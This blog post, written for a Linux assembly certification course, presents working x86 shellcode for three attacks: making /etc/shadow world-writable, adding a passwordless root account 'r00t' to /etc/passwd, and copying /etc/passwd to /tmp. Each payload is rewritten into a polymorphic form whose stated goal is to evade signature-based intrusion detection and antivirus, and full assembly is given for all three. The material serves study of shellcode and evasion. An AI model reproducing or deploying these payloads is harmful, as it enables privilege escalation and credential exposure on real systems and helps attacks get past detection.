SLAE: Polymorphic Shellcodes

Intro

This blog post has been created for completing the requirements of the SecurityTube Linux Assembly Expert certification: http://securitytube-training.com/online-courses/securitytube-linux-assembly-expert/

Student ID: SLAE-924

The task is to:

  • Take up 3 shellcodes from Shell-Storm and create polymorphic versions of them to beat pattern matching
  • The polymorphic versions cannot be larger than 150% of the existing shellcode
  • Bonus points for making it shorter in length than original

chmod(“/etc/shadow”, 0666) and exit

This shellcode can be found here. Its size is 36 bytes. Original shellcode:

section .text
 global _start

_start:
    ; chmod("/etc/shadow", 0666) then exit.  Making the shadow file
    ; world-readable/writable exposes every password hash on the box.
    ; The string is built with byte/word/dword pushes so that the encoded
    ; shellcode contains no NUL byte.
    xor edx, edx          ; edx = 0, used below as the string terminator
    push byte 15          ; eax = 15 (sys_chmod)
    pop eax
    push edx              ; NUL terminator
    push byte 0x77        ; "w" (pushed as a dword: 77 00 00 00)
    push word 0x6f64      ; "do"
    push 0x6168732f       ; "/sha"
    push 0x6374652f       ; "/etc"  -> esp points at "/etc/shadow\0"
    mov ebx, esp          ; ebx = pathname
    push word 0666Q       ; ecx = mode 0666 (octal)
    pop ecx
    int 0x80              ; chmod syscall (return value is not checked)

    push byte 1           ; eax = 1 (sys_exit); ebx is left as-is, so the
    pop eax               ; exit status is whatever the pointer's low byte is
    int 0x80              ; exit syscall

Let’s modify it to beat signature-based intrusion detection systems and AVs.

push byte 0x77      ; "w" (pushed as a dword: 77 00 00 00)
push word 0x6f64    ; "do"
push 0x6168732f     ; "/sha"
push 0x6374652f     ; "/etc"  -> "/etc/shadow", NUL-free encoding

We’ll modify as:

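push 0x776f6461     ; "adow"  -- a single "push 0x776f64" would encode as
push 0x68732f2f     ; "//sh"     68 64 6f 77 00 and reintroduce a NUL byte;
push 0x6374652f     ; "/etc"     padding the path with a second '/' keeps it
                    ;            NUL-free, and the kernel collapses the slashes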

And also we will modify exit function. In original shellcode:

push byte 1         ; eax = 1 (sys_exit)
pop eax

In our shellcode:

xor eax, eax        ; eax = 1 (sys_exit) built without the "6a 01 58" byte pattern
inc eax

Result shellcode:

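section .text
global _start

_start:
    ; chmod("/etc//shadow", 0666) then exit.
    ; The doubled slash pads the path to 12 bytes so it can be built from
    ; three dword pushes (one byte shorter than the original byte+word+dword
    ; sequence) without a NUL byte in the encoded shellcode; the kernel
    ; collapses repeated slashes, so the path still names /etc/shadow.
    xor edx, edx          ; edx = 0, used as the string terminator
    push byte 15          ; eax = 15 (sys_chmod)
    pop eax
    push edx              ; NUL terminator
    push 0x776f6461       ; "adow"
    push 0x68732f2f       ; "//sh"
    push 0x6374652f       ; "/etc"  -> esp points at "/etc//shadow\0"
    mov ebx, esp          ; ebx = pathname
    push word 0666Q       ; ecx = mode 0666 (octal)
    pop ecx
    int 0x80              ; chmod syscall (return value is not checked)

    xor eax, eax          ; eax = 1 (sys_exit) without the push/pop byte pattern
    inc eax
    int 0x80              ; exit syscall (status = low byte of ebx, the pointer)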

Our shellcode is even 1 byte smaller than the original (35 bytes) :) One caveat: the obvious single-instruction replacement `push 0x776f64` is encoded as `68 64 6f 77 00` and would put a null byte into the shellcode, which the original’s byte/word pushes deliberately avoid. Padding the path to 12 bytes with a doubled slash — `push 0x776f6461` (“adow”), `push 0x68732f2f` (“//sh”), `push 0x6374652f` (“/etc”) — builds “/etc//shadow”, which the kernel resolves to the same file, keeps the 35-byte size and stays null-free.

add root user ‘r00t’ with no password shellcode

Shellcode is available here

Let’s modify it to beat signature-based intrusion detection systems and AVs.

push byte 5         ; eax = 5 (sys_open)
pop eax

was modified to

push byte 5         ; edi = 5; edi is then kept as a running syscall-number
pop edi             ; counter for the following calls
mov eax, edi        ; eax = 5 (sys_open)

in write function:

push byte 4         ; eax = 4 (sys_write)
pop eax

was modified to:

dec edi             ; edi = 4
mov eax, edi        ; eax = 4 (sys_write)

in close function:

push byte 6         ; eax = 6 (sys_close)
pop eax

was modified to:

inc edi             ; edi = 5
inc edi             ; edi = 6
xchg eax, edi       ; eax = 6 (sys_close); one-byte encoding instead of a mov

Full modified shellcode:

section .text
     global _start

_start:

 ; open("/etc//passwd", O_WRONLY | O_APPEND)
 ; edi is used as a running syscall-number counter (5 -> 4 -> 6) so none of
 ; the three syscall setups carries the original "push byte N / pop eax" bytes.

       push byte 5
       pop edi              ; edi = 5
       mov eax, edi         ; eax = 5 (sys_open)
       xor ecx, ecx
       push ecx             ; NUL terminator
       push 0x64777373      ; "sswd"
       push 0x61702f2f      ; "//pa"  (doubled slash pads the path to 12 bytes;
       push 0x6374652f      ; "/etc"   the kernel still resolves it as /etc/passwd)
       mov ebx, esp         ; ebx = pathname
       mov cx, 02001Q       ; ecx = O_APPEND (02000) | O_WRONLY (01); upper half already 0
       int 0x80

       mov ebx, eax         ; ebx = fd (no error check; without root the open
                            ; fails and the write below simply fails too)

  ; write(ebx, "r00t::0:0:::", 12)
  ; passwd record: user "r00t", empty password field, uid 0, gid 0, empty
  ; gecos/home/shell.  No trailing '\n' is written, so the record is glued
  ; onto the last line if /etc/passwd does not already end with a newline.

       dec edi              ; edi = 4
       mov eax, edi         ; eax = 4 (sys_write)
       xor edx, edx
       push edx             ; NUL terminator
       push 0x3a3a3a30      ; "0:::"
       push 0x3a303a3a      ; "::0:"
       push 0x74303072      ; "r00t"
       mov ecx, esp         ; ecx = record
       push byte 12
       pop edx              ; edx = 12 (record length, terminator not written)
       int 0x80

  ; close(ebx)

       inc edi              ; edi = 5
       inc edi              ; edi = 6
       xchg eax, edi        ; eax = 6 (sys_close); one-byte encoding instead of a mov
       int 0x80

  ; exit()

       push byte 1          ; eax = 1 (sys_exit); ebx (the fd) becomes the status
       pop eax
       int 0x80

Original shellcode length was: 69 bytes. Modified shellcode length is only 2 bytes larger: 71 bytes.

Copy /etc/passwd to /tmp/outfile

Shellcode is available here. Its size is 97 bytes. Let’s modify it to beat signature-based intrusion detection systems and AVs.

xor eax,eax         ; eax = 0
mov al,0x5          ; eax = 5 (sys_open)
xor ecx,ecx         ; ecx = 0 (O_RDONLY), also pushed as the string terminator

was replaced with

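xor eax, eax
mov ecx, eax        ; ecx = 0 (O_RDONLY) -- must be copied while eax is still
add al, 0x5         ; zero; copying after this line would give flags = 5 and
                    ; push 0x00000005 instead of the NUL terminator, so the
                    ; pathname would become "/etc//passwd\x05" and open() fail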

An extra 0x2f (‘/’) was inserted to get /etc//passwd: the kernel collapses repeated slashes, so the path still resolves to /etc/passwd, but every pushed dword (and therefore the byte pattern) changes:

push 0x64777373     ; "sswd"
push 0x61702f2f     ; "//pa"
push 0x6374652f     ; "/etc"  -> "/etc//passwd" (doubled slash collapsed by the kernel)

In sys_read function:

push WORD 0xffff    ; edx = 0xffff (read count)
pop edx

was replaced with:

xor edx, edx        ; edx = 0
dec dx              ; dx wraps to 0xffff, so edx = 0x0000ffff (read count)

In sys_open function:

push 0x5            ; eax = 5 (sys_open)
pop eax
xor ecx,ecx         ; ecx = 0, also pushed as the string terminator

was replaced with:

xor eax, eax
mov ecx, eax        ; ecx = 0, copied while eax is still zero
add al,0x5          ; eax = 5 (sys_open)

In sys_write function:

push 0x4            ; eax = 4 (sys_write)
pop eax

was replaced with:

xor eax, eax        ; eax = 4 (sys_write) without the push/pop byte pattern
add al,0x4

And finally in sys_exit function:

xor eax,eax
xor ebx,ebx
mov al,0x1          ; eax = 1 (sys_exit)
mov bl,0x5          ; ebx = 5 (exit status)

was replaced with:

xor ebx,ebx
mov eax, ebx        ; eax = 0 via ebx instead of a second xor
add al, 0x1         ; eax = 1 (sys_exit)
add bl, 0x5         ; ebx = 5 (exit status)

Full modified shellcode:

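global _start
section .text
_start:
    ; open("/etc//passwd", O_RDONLY)
    ; ecx must be copied from eax while eax is still zero: copying after
    ; "add al, 0x5" (as the first draft did) would set the flags to 5 and,
    ; worse, push 0x00000005 instead of the NUL terminator, so the pathname
    ; would be "/etc//passwd\x05" and open() would fail.
    xor eax, eax
    mov ecx, eax       ; ecx = 0 (O_RDONLY); also the string terminator
    add al, 0x5        ; eax = 5 (sys_open)
    push ecx           ; NUL terminator
    push 0x64777373    ; "sswd"
    push 0x61702f2f    ; "//pa"
    push 0x6374652f    ; "/etc"  -> "/etc//passwd" (doubled slash collapsed by the kernel)
    mov ebx, esp       ; ebx = pathname
    int 0x80

    ; read(fd, esp, 0xffff): the stack itself is the buffer, so the pathname
    ; just used is overwritten by the file contents.  No error check, as in
    ; the original: if open() failed, eax holds -errno and "mov al, 3" turns
    ; it into a bogus syscall number.
    mov ebx,eax        ; ebx = fd (upper bytes of eax are zero for a small fd)
    mov al,0x3         ; eax = 3 (sys_read)
    mov edi,esp        ; edi = buffer, kept for the write() below
    mov ecx,edi
    xor edx, edx
    dec dx             ; edx = 0xffff (count) with no NUL in the encoding
    int 0x80

    mov esi, eax       ; esi = bytes read

    ; open("/tmp/outfile", O_CREAT | O_WRONLY, 0644)
    ; The pushes land below edi, so they do not clobber the data just read.
    xor eax, eax
    mov ecx, eax       ; ecx = 0 while eax is still zero
    add al,0x5         ; eax = 5 (sys_open)
    push ecx           ; NUL terminator
    push 0x656c6966    ; "file"
    push 0x74756f2f    ; "/out"
    push 0x706d742f    ; "/tmp"  -> "/tmp/outfile"
    mov ebx,esp        ; ebx = pathname
    mov cl,0102o       ; ecx = O_CREAT (0100) | O_WRONLY (01)
    push WORD 0644o    ; edx = mode 0644
    pop edx
    int 0x80

    ; write(fd, buffer, bytes_read)
    mov ebx,eax        ; ebx = fd of /tmp/outfile
    xor eax, eax
    add al,0x4         ; eax = 4 (sys_write)
    mov ecx,edi        ; ecx = buffer holding the /etc/passwd data
    mov edx,esi        ; edx = length
    int 0x80

    ; exit(5)
    xor ebx,ebx
    mov eax, ebx       ; eax = 0 via ebx instead of a second xor
    add al, 0x1        ; eax = 1 (sys_exit)
    add bl, 0x5        ; ebx = 5 (exit status)
    int 0x80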

The size of modified shellcode: 98 bytes.